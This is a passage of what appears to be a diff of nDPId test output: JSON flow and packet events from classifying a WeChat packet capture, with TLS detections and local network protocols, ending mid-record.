+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1553,"packets-processed":1552,"total-skipped-flows":0,"total-l4-payload-len":556502,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":60,"total-detection-updates":64,"total-updates":5,"current-active-flows":30,"total-active-flows":75,"total-idle-flows":45,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":465,"global_ts_msec":1492171154216} +00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1553,"packets-processed":1552,"total-skipped-flows":0,"total-l4-payload-len":556502,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":60,"total-detection-updates":62,"total-updates":5,"current-active-flows":30,"total-active-flows":75,"total-idle-flows":45,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":463,"global_ts_msec":1492171154216} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7580000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154792,"flow_last_seen":1492171154792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492171154792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171154792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0MxpAAEAGXPXAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT0MFQAAAQEICgA\/OqCGKY\/Q"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167449288,"flow_last_seen":1492167820408,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1492167440984,"flow_last_seen":1492167822531,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167440370,"flow_last_seen":1492167815567,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 